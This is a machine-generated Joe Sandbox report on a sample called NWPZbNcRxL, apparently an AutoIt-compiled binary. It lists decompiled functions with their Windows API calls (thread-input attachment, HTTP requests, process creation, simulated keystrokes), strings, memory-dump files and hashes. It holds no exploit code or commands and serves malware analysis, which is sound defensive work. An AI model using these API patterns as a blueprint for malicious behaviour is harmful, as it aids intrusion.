AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C71245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C71257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C7129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C712B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C712BC

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 3b4664c538a4440f9f3dd0066c7cf847456dbc6f6bb05917dd7d503946f3c93c
Instruction ID: cf1ff42b42688a4692964afbb4dc8ee27f12f0de0a8c99ae2035dc3a322c3a68
Opcode Fuzzy Hash: 3b4664c538a4440f9f3dd0066c7cf847456dbc6f6bb05917dd7d503946f3c93c
Instruction Fuzzy Hash: BD319E75601704FBDB209F98EC88F6D77A9EB54311F24812AFD18D61A1E7B49E40CB60

Function 00C1FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C1FAA6
OleUninitialize.OLE32(?,00000000), ref: 00C1FB45
UnregisterHotKey.USER32(?), ref: 00C1FC9C
DestroyWindow.USER32(?), ref: 00C545D6
FreeLibrary.KERNEL32(?), ref: 00C5463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C54668

Strings

close all, xrefs: 00C1FAA1

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: a1960890d29719f0a6afb1e89efae3626d9cfbbfd82b43762f609bb341adeab7
Instruction ID: 45110a2b7c8692468f1c28fbcda1786fb4886a03dcdda065ea19dba5093483b7
Opcode Fuzzy Hash: a1960890d29719f0a6afb1e89efae3626d9cfbbfd82b43762f609bb341adeab7
Instruction Fuzzy Hash: 0DA17034301212CFCB29EF14C5A4BA9F364AF06705F5442ADE80AAB251DB30ED97EF94

Function 00C6A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00C6A439), ref: 00C6A377

Strings

REGEXPCLASS, xrefs: 00C6A13C
TEXT, xrefs: 00C6A2AE
NAME, xrefs: 00C6A1A9
CLASS, xrefs: 00C6A0F6
INSTANCE, xrefs: 00C6A285
CLASSNN, xrefs: 00C6A119

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 1abcd7ebf48c09b8f299453e7bb5fcd22a6a1c91246dbbda258604561e0eba1a
Instruction ID: 69f00f6b6ec0e988dca48dd48757d39e91680ddf1820f979eeff3de127cffd09
Opcode Fuzzy Hash: 1abcd7ebf48c09b8f299453e7bb5fcd22a6a1c91246dbbda258604561e0eba1a
Instruction Fuzzy Hash: FF91A571604605EACB18DFA0C492BEDFBB4FF05300F548129E85AB7251DF31AA99EF91

Function 00C12E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00C12EAE

Part of subcall function 00C11DB3: GetClientRect.USER32(?,?), ref: 00C11DDC
Part of subcall function 00C11DB3: GetWindowRect.USER32(?,?), ref: 00C11E1D
Part of subcall function 00C11DB3: ScreenToClient.USER32(?,?), ref: 00C11E45

GetDC.USER32 ref: 00C4CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C4CD45
SelectObject.GDI32(00000000,00000000), ref: 00C4CD53
SelectObject.GDI32(00000000,00000000), ref: 00C4CD68
ReleaseDC.USER32(?,00000000), ref: 00C4CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C4CDFB

Strings

U, xrefs: 00C4CCD0

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 1ff678b5cd4978a0e80e5d5a186e35560e71f9dfb276bfce5f7620c6263d2f19
Instruction ID: b75d486d1f4763d1b9b9a19bc50e484b6d9ecd2061d27ee0c688b565afaea80e
Opcode Fuzzy Hash: 1ff678b5cd4978a0e80e5d5a186e35560e71f9dfb276bfce5f7620c6263d2f19
Instruction Fuzzy Hash: D771DC35901209DFCF618F64C8C4AFA3BB5FF49321F14427AED659A2B6C7318991EB60

Function 00C81A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C81A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C81A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C81ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C81AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C81AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C81B10
InternetCloseHandle.WININET(00000000), ref: 00C81B57

Part of subcall function 00C82483: GetLastError.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C82498
Part of subcall function 00C82483: SetEvent.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C824AD

Strings

, xrefs: 00C81B01

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 964d9b7ee597bc0a8b6ebda61a959bd47a6ececb5a463529ce1825ee1fa48d52
Instruction ID: 179d34ecd63109467328b0f88275207c5798fadfadbe8bf6436909d2546c89ce
Opcode Fuzzy Hash: 964d9b7ee597bc0a8b6ebda61a959bd47a6ececb5a463529ce1825ee1fa48d52
Instruction Fuzzy Hash: C9414CB1501218BFEB15AF51CC89FFF7BACEB08358F04412AFD159A141E7709E469BA8

Function 00C88C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C9F910), ref: 00C88D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C9F910), ref: 00C88D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C88ED6
SysFreeString.OLEAUT32(?), ref: 00C88F00

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 5bb36202bb4ce0702141d4966ca857937a625c7ff16e7bb3a8de8d51225810b7
Instruction ID: 56d659fd501a70e7f07a78a61ad3d5e333917f8c48def7d2c73951c566f49e5f
Opcode Fuzzy Hash: 5bb36202bb4ce0702141d4966ca857937a625c7ff16e7bb3a8de8d51225810b7
Instruction Fuzzy Hash: 4CF15B71A00209EFCF14EF94C888EAEB7B9FF49318F148458F915AB251DB31AE46DB54

Function 00C8F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C8F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C8FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C8FA7C
CloseHandle.KERNEL32(?), ref: 00C8FAAB
CloseHandle.KERNEL32(?), ref: 00C8FB22

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: abe9d5c313801cc5938ba73559baaf4c2735bc0ff7045e70745b4aa9fc5dbeef
Instruction ID: 5bdf312a89191673b26e1b3495d4326cea6d1d3d82b47a64d03290515fe5a470
Opcode Fuzzy Hash: abe9d5c313801cc5938ba73559baaf4c2735bc0ff7045e70745b4aa9fc5dbeef
Instruction Fuzzy Hash: 52E1A1316043009FDB14EF24C891B6EBBE1EF85318F14856DF8999B2A2CB31DD46EB56

Function 00C74CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C73697,?), ref: 00C7468B

Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C73697,?), ref: 00C746A4

Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32

lstrcmpiW.KERNEL32(?,?), ref: 00C74D40
_wcscmp.LIBCMT ref: 00C74D5A
MoveFileW.KERNEL32(?,?), ref: 00C74D75

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 391aff3c73a9ade27ec92984c67aed06dd3f908af0e9982db7912447975ca680
Instruction ID: a920c7d70c417c241e3ebb956274dfb9d747d9332de474b482d90dc8a63a34d9
Opcode Fuzzy Hash: 391aff3c73a9ade27ec92984c67aed06dd3f908af0e9982db7912447975ca680
Instruction Fuzzy Hash: FD5151B20083859BC724EBA0D8819DFB3ECAF85350F00492EF699D3151EF75E689D766

Function 00C98645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C986FF

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 007f31fb8ba62c74c5a493708a88bb613c7c4172a780238a7fe6aeb8180d3b13
Instruction ID: a22b11572af4400c54b53032f060f357014da11fe0f95dd9ca5330b92f49fb1c
Opcode Fuzzy Hash: 007f31fb8ba62c74c5a493708a88bb613c7c4172a780238a7fe6aeb8180d3b13
Instruction Fuzzy Hash: 96518130500244FEDF209B65CC8DFAD7BA5AB06760F604116FA61EB1E1CF71EA98DB54

Function 00C12B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C4C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C4C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C4C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C4C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C4C370
DestroyIcon.USER32(00000000), ref: 00C4C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C4C39C
DestroyIcon.USER32(?), ref: 00C4C3AB

Part of subcall function 00C9A4AF: DeleteObject.GDI32(00000000), ref: 00C9A4E8

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: fa38725d135644b32638bab3004453bed50022d10a0b8b7090f2b67f1ac63fa5
Instruction ID: 63a5edead006c99a48be93fd3a4e8435794c35f2c990d039f8177e1b35e2954e
Opcode Fuzzy Hash: fa38725d135644b32638bab3004453bed50022d10a0b8b7090f2b67f1ac63fa5
Instruction Fuzzy Hash: 42516774A00209AFDB24DF65CC85FAE7BA5FB19310F104529F912D72A0D7B0EDA1EB90

Function 00C6966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C6A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C6A84C
Part of subcall function 00C6A82C: GetCurrentThreadId.KERNEL32 ref: 00C6A853
Part of subcall function 00C6A82C: AttachThreadInput.USER32(00000000,?,00C69683,?,00000001), ref: 00C6A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C6968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C696AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C696AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C696B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C696D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C696D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C696E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C696F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C696FB

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 3c37a90a801ca24ccc9d0dd4f45b8b4fd2e92584057790fbccc3d1588c588746
Instruction ID: f720ba76d77f656217f760b63142db45f969a56ec34eee8ef064b659c168c6d3
Opcode Fuzzy Hash: 3c37a90a801ca24ccc9d0dd4f45b8b4fd2e92584057790fbccc3d1588c588746
Instruction Fuzzy Hash: 57118EB1950618BEF6206B61DC8DF6E7A2DEB4C751F11042AF244AB0A1C9F26C529AE4

Function 00C68921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C6853C,00000B00,?,?), ref: 00C6892A
HeapAlloc.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C68931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C6853C,00000B00,?,?), ref: 00C68946
GetCurrentProcess.KERNEL32(?,00000000,?,00C6853C,00000B00,?,?), ref: 00C6894E
DuplicateHandle.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C68951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C6853C,00000B00,?,?), ref: 00C68961
GetCurrentProcess.KERNEL32(00C6853C,00000000,?,00C6853C,00000B00,?,?), ref: 00C68969
DuplicateHandle.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C6896C
CreateThread.KERNEL32(00000000,00000000,00C68992,00000000,00000000,00000000), ref: 00C68986

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 906172d873b52033a0d703181485756b337e7ca51818cad5315ac70d945d62ac
Instruction ID: 6830be31c0d04a1e5f4f698ca0d5a44eae29cc5416253e662bdca98f6120db82
Opcode Fuzzy Hash: 906172d873b52033a0d703181485756b337e7ca51818cad5315ac70d945d62ac
Instruction Fuzzy Hash: 9701BBB5240308FFEB10ABA5DC4DF6F3BACEB89711F508426FA05DB1A1CA709801CB64

Function 00C89B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00C89B7B
NULL Pointer assignment, xrefs: 00C89BA4, 00C89EC8

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: d1015df09f1f703c2f44eb253d8d0bfec72186ac1bb1dbe9695f0714171cd6f9
Instruction ID: 4def5d12bc6b349c5e5a78e9411fb5f4655c250803dd4f096d86307f2a999d3e
Opcode Fuzzy Hash: d1015df09f1f703c2f44eb253d8d0bfec72186ac1bb1dbe9695f0714171cd6f9
Instruction Fuzzy Hash: 55C1A371A002199FDF10EF98D884BBEB7F5FB48318F188469E915E7280E771AE45CB94

Function 00C89113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C89167
VariantInit.OLEAUT32(?), ref: 00C89238
VariantInit.OLEAUT32(?), ref: 00C89339
VariantClear.OLEAUT32(?), ref: 00C89343
VariantClear.OLEAUT32(?), ref: 00C893A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00C8931C
Null Object assignment in FOR..IN loop, xrefs: 00C891C8, 00C892F6, 00C893AE

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 2cbc5fc16390dbe5e38784c12e90b53ad1e19ebc58d583ce4b883e84669f1ad0
Instruction ID: 5fcad8f2e6a539a6aafbd2ab5b08b6ac8ec52204cb406d72847a59e0b172a6e1
Opcode Fuzzy Hash: 2cbc5fc16390dbe5e38784c12e90b53ad1e19ebc58d583ce4b883e84669f1ad0
Instruction Fuzzy Hash: 5191BF71A00219ABDF20EFA5C848FAFB7B8EF45718F14811DF515AB290D7709A45CFA4

Function 00C8975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00C6710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?,?,00C67455), ref: 00C67127
Part of subcall function 00C6710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67142
Part of subcall function 00C6710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67150
Part of subcall function 00C6710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?), ref: 00C67160

